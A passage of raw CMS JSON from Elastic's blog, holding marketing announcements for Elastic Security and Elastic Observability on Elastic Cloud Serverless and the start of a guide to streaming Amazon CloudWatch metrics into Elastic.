growing set of large language model (LLM) options, ranging from frontier models like Anthropic Claude to custom models via LM Studio. It grounds responses in real-time organizational context, such as user risk score, asset criticality, and host context, using retrieval augmented generation (RAG) to provide meaningful insights.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Try it free","_metadata":{"uid":"csa801521b2500d7c9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security on Elastic Cloud Serverless is the fastest and easiest way to experience AI-driven security analytics. \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/serverless-registration\"\u003e\u003cspan style='font-size: 12pt;'\u003eTry it now\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs86b034f2ddc421c5"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs45909fdb3154fd8b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5c0546840fbdf7d9"}}}],"publish_date":"2024-12-02","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Implement AI-driven security analytics faster on Elastic Cloud Serverless, the easiest way to harness the innovations of Elastic Security","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt4732ba20ad170771","ACL":{},"created_at":"2023-11-06T20:48:01.608Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"public-multi-hybrid-cloud","label_l10n":"Public, multi \u0026 hybrid cloud","tags":[],"title":"Public, multi \u0026 hybrid cloud","updated_at":"2023-11-06T20:48:01.608Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:37:51.878Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blte007e1c9cef6ad6b","ACL":{},"created_at":"2020-06-17T03:32:48.898Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"endpoint-security","label_l10n":"Endpoint security","tags":[],"title":"Endpoint security","updated_at":"2020-07-06T22:20:15.552Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-03-23T17:30:22.357Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt7e1d7d4f8e4b489b","_version":1,"title":"158175 - Blog header image_1.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T18:26:59.116Z","updated_at":"2024-11-26T18:26:59.116Z","content_type":"image/jpeg","file_size":"164783","filename":"158175_-_Blog_header_image_1.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-02T12:30:08.867Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7e1d7d4f8e4b489b/674612f325608607badf4505/158175_-_Blog_header_image_1.jpg"},"title":"Elastic Security on Elastic Cloud Serverless enters general availability","title_l10n":"Elastic Security on Elastic Cloud Serverless enters general availability","updated_at":"2024-12-02T12:30:03.328Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-security-on-cloud-serverless","publish_details":{"time":"2024-12-02T12:30:08.614Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt730e7f7492260c3c","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Introducing Elastic Observability on Elastic Cloud Serverless! Learn more about our fully managed, scalable observability built on the proven Elastic Search AI Platform with cost-efficient storage and high-performance analytics for SRE teams.","author":["blt19aa6eaf05f480b6","blt376fbd12dc9ac1b7"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-26T18:55:25.551Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0176cf82de8a21ad"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs organizations scale, an observability solution that can handle the complexity of distributed cloud environments and provide real-time insights often feels like an insurmountable challenge often due to data- and cost-related compromises. Elastic Observability — now generally available on Elastic Cloud Serverless — is fully managed, offering hassle-free operations and effortless scale with an architecture optimized for low-latency queries, boundless storage, and the full power of Elasticsearch.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability has evolved significantly since the early days of the ELK Stack, which transformed how organizations collected, searched, and analyzed their operational data. Originally designed as a self-managed solution for logs, metrics, and traces, the ELK Stack — with \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eover 5 billion downloads\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e — became the cornerstone of modern observability. Over time, Elastic innovated to meet the growing demands of distributed, cloud-native environments by first introducing Elastic Stack Hosted and now Elastic Cloud Serverless.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability on Elastic Cloud Serverless enables site reliability engineers (SREs) to monitor and optimize their environments with ease. Our Search AI Lake — with its cloud-native architecture — separates compute and storage allowing SREs to scale telemetry ingest, optimize storage, and use advanced AI for actionable insights. Elastic Cloud Serverless offers a reliable, cost-effective approach to observability that few others can match.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eKey benefits of Elastic Observability on Elastic Cloud Serverless include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHassle-free observability\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOut-of-the-box curated workflows and dashboards\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCost-efficient and scalable data storage with Search AI Lake\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImproved delivery for system reliability\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEasy deployments from anywhere — a strategy that evolves with your environment\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSimplified consumption-based pricing\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Hassle-free observability","_metadata":{"uid":"cs360f809672f8cc8a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless delivers a fully managed observability solution that is tuned to meet the needs of SRE and operations teams. Compared to the open source ELK Stack, there is no need to manage backend provisioning, scaling, capacity planning, or upgrades with Elastic Cloud Serverless. Elastic Observability on Elastic Cloud Serverless eliminates all management complexity and overhead so that SREs can focus on innovation instead of managing their observability solution.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2b007f07d51ece5c"}}},{"image":{"image":{"uid":"bltee8cdad87cbd7bd7","_version":1,"title":"image3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T18:47:02.898Z","updated_at":"2024-11-26T18:47:02.898Z","content_type":"image/png","file_size":"367347","filename":"image3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-02T12:29:59.991Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltee8cdad87cbd7bd7/674617a627811845725d6228/image3.png"},"_metadata":{"uid":"csfecfecf0852fe20f"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Out-of-the-box curated workflows and dashboards","_metadata":{"uid":"cse989cc2f28407b08"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability’s curated workflows simplify getting started and scaling for all of your observability needs. Whether it's logs, metrics, or traces for infrastructure, Kubernetes, applications, or specific components, SREs are provided with easy onboarding mechanisms to bring data into Elastic in seconds.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs63236790c7d2a6c0"}}},{"image":{"image":{"uid":"blt4ec700d93f6753b8","_version":1,"title":"image2.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T18:47:23.746Z","updated_at":"2024-11-26T18:47:23.746Z","content_type":"image/png","file_size":"288053","filename":"image2.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-02T12:30:00.004Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4ec700d93f6753b8/674617bbde8d39470aef702f/image2.png"},"_metadata":{"uid":"csd4044f4577cbafa0"},"caption_l10n":"","alt_text_l10n":"add observability data","disable_lightbox":false,"remove_shadow":true,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs619c626b6c01c1ec"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eData onboarding workflows with simple, intuitive, out-of-the-box dashboards for AWS, Azure, GCP, Kubernetes, and more are now available with Elastic Observability on Elastic Cloud Serverless. SREs don’t have to manage ingest, develop customized views, or even handle tedious schema conversions — accelerating time to observability for SREs.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic is also now 100% OpenTelemetry (OTel)-native, retaining OTel data natively without requiring data translation. This eliminates the need for SREs to handle tedious schema conversions and develop customized views. All Elastic Observability capabilities, such as entity discovery, entity-centric insights, APM, infrastructure monitoring, and AI-driven issue analysis, now seamlessly work with native OTel data.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Cost-efficient and scalable data storage with Search AI Lake","_metadata":{"uid":"cs3676a66f58456f5d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless storage simplifies scalability while maximizing efficiency by using cost-effective object storage and minimizing data duplication. Search AI Lake eliminates redundant replication, uses advanced compression techniques, and efficiently stores data, significantly lowering storage costs.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIt delivers low-latency search capabilities ensuring quick queries and contextual analysis across large data volumes at scale. In addition, Elastic’s AI-driven query engine accelerates root cause analysis, enabling organizations to access precise and actionable insights faster than ever before. With Elastic Cloud Serverless, you benefit from storage that is not only cost-effective but also performance-optimized — driving lower mean time to resolution (MTTR) for surfacing unknown unknowns.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Improved delivery for system reliability","_metadata":{"uid":"cs98fec8267c0a9ffc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability on Elastic Cloud Serverless enhances system reliability by equipping SREs with powerful, AI-driven tools to streamline operations, accelerate problem resolution, and boost productivity.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe retrieval augmented generation (RAG)-based Elastic AI Assistant integrates telemetry data with organizational knowledge, such as GitHub issues, standard operating procedures (SOPs), runbooks, and customer cases, to provide meaningful insights and resolve issues faster. Complementing RAG, Elastic’s zero-configuration machine learning (ML) and artificial intelligence for IT operations (AIOps) automate root cause analysis — reducing configuration complexity while delivering precise and actionable insights. Together, these tools empower teams to quickly address challenges and minimize operational disruptions. SREs can significantly reduce MTTR and focus on proactive, data-driven decision-making.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic Observability, your way — Deploy anywhere","_metadata":{"uid":"csa6c9768ebb37c325"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFlexibility is key in today’s dynamic environments. Elastic empowers you to deploy an observability solution that supports your unique operational needs. Whether you prefer on-premises, self-managed Elastic Stack, Elastic Cloud Hosted, or Elastic Cloud Serverless, the platform is built to meet your needs wherever you are. This versatility ensures that your observability strategy can evolve with your environment whether you're modernizing legacy systems or scaling dynamic cloud-native architectures.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Simplified consumption-based pricing","_metadata":{"uid":"cs5fce17225f0614d8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless takes the guesswork out of budgeting with simplified consumption pricing. You only pay for what you use — ensuring predictable costs that scale with your needs. This model eliminates the overhead of managing capacity and resource planning, enabling you to focus on insights and innovation instead of infrastructure management.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’re also happy to introduce new volume pricing for observability data using a tiered pricing model. This approach simplifies scaling by reducing costs per unit as data usage increases. Pricing decreases with higher data volumes and is divided into tiers based on data ingested and retained.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Why choose Elastic Cloud Serverless for observability?","_metadata":{"uid":"cs15964d713bd16d42"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud Serverless combines the power of AI, ML, generative AI, and analytics to create an observability solution that meets the demands of complex production environments. It is designed to be production-ready — providing an open source, secure, and hassle-free experience along with deployment flexibility and cost-effectiveness.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhether you’re monitoring large-scale microservices or handling the complexities of diverse systems, Elastic Observability on Elastic Cloud Serverless can scale seamlessly to support your needs without adding unnecessary complexity. These capabilities empower teams to resolve issues efficiently, optimize performance, and focus on innovation rather than operational challenges. \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/serverless-registration\"\u003e\u003cspan style='font-size: 12pt;'\u003eTry it today\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9e9f9817484d86e4"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs758eb5315558de47"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf75c2e375a3c663a"}}}],"publish_date":"2024-12-02","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Upgrade your observability with Elastic Cloud Serverless ","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"Announcing the general availability of Elastic Observability on Elastic Cloud Serverless — a fully managed observability solution","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt125bc76f1d7f3ea9","_version":1,"title":"158175 - Blog header image_3.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T18:45:46.052Z","updated_at":"2024-11-26T18:45:46.052Z","content_type":"image/jpeg","file_size":"161053","filename":"158175_-_Blog_header_image_3.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-02T12:29:59.974Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt125bc76f1d7f3ea9/6746175aaafcfce17dadd106/158175_-_Blog_header_image_3.jpg"},"title":"From ELK Stack to easy — Elastic Observability on Elastic Cloud Serverless","title_l10n":"From ELK Stack to easy — Elastic Observability on Elastic Cloud Serverless","updated_at":"2024-12-02T12:29:54.064Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-observability-serverless","publish_details":{"time":"2024-12-02T12:29:59.606Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt59eccd3a2e38de38","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"Learn how integrating Amazon CloudWatch Metric Streams with Elastic unlocks the potential for real-time streaming, better operational insights, and seamless monitoring of your AWS resources in this step-by-step blog.","author":["blt5913558de3429222","blt2e7c8afc9665fff8"],"category":["blte5cc8450a098ce5e"],"created_at":"2024-11-26T16:28:56.580Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9da65e578510d92b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn today’s data-driven world, organizations need to harness the power of real-time monitoring and analysis. \u003c/span\u003e\u003ca href=\"https://aws.amazon.com/cloudwatch/\"\u003e\u003cspan style='font-size: 12pt;'\u003eAmazon CloudWatch\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e native monitoring service provides a robust platform for tracking metrics, logs, and events from various Amazon Web Services (AWS) resources. However, when you need to extend your monitoring and analytics beyond CloudWatch, integrating CloudWatch with Elastic can be a game-changer.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability unifies logs, metrics, and application performance monitoring (APM) traces for a full contextual view across your hybrid \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/aws-service-metrics-monitor-observability-easy\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS environments alongside their on-premises data sets\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Elastic Observability enables you to track and monitor performance \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability/aws-monitoring\"\u003e\u003cspan style='font-size: 12pt;'\u003eacross a broad range of AWS services\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, including AWS Lambda, Amazon Elastic Compute Cloud (EC2), Amazon Elastic Container Service (ECS), Amazon Elastic Kubernetes Service (EKS), Amazon Simple Storage Service (S3), Amazon Cloudtrail, Amazon Network Firewall, and many more.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability — in combination with the Elastic AI Assistant — enables the creation of a dynamic context window that enhances the quality of responses from a large language model (LLM). This powerful integration significantly improves the accuracy and relevance of answers. For example, when you ask the Elastic AI Assistant about a specific issue affecting your application, it collects all the pertinent details, such as current anomalies captured from metrics or insights from a related runbook stored in the Elastic AI Assistant’s knowledge base.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo simplify this process and reduce management overhead of agents, AWS customers can now use the new Amazon Cloudwatch Metric Stream to ingest metrics into Elastic Cloud in real time and view them in Elastic alongside other metrics for centralized analytics. This eliminates the necessity for time-consuming and expensive procedures, such as agent provisioning or data shipper operations.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog, we’ll explore how to stream Amazon CloudWatch metrics directly to Elastic using CloudWatch Metric Streams. This integration offers real-time data streaming — enabling faster detection of anomalies, more granular insights, and better operational visibility.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"What is CloudWatch Metric Streams?","_metadata":{"uid":"cs781d9de2fccf4eab"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAmazon CloudWatch Metric Streams is a feature that allows you to stream CloudWatch metric data to external destinations in real time. Instead of waiting for periodic CloudWatch API polling or pushing metrics to third-party services manually, Metric Streams allows for near-instantaneous delivery of CloudWatch metrics.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Why should you stream metrics to Elastic?","_metadata":{"uid":"cse99cb901ff619c98"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic is a powerful search and analytics engine often used for logging, monitoring, and analyzing large data sets. By streaming CloudWatch metrics directly to Elasticsearch, you can take advantage of Elastic's powerful query, visualization, dashboard, and generative AI capabilities. Some key benefits of this integration include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eReal-time monitoring:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Get real-time insights and alerts based on CloudWatch metrics.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCentralized analytics: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eCombine metrics with logs, traces, and other data sources for more powerful correlation and troubleshooting.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCustom dashboards:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Use Kibana to create custom dashboards that combine CloudWatch metrics with other data points for richer insights.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 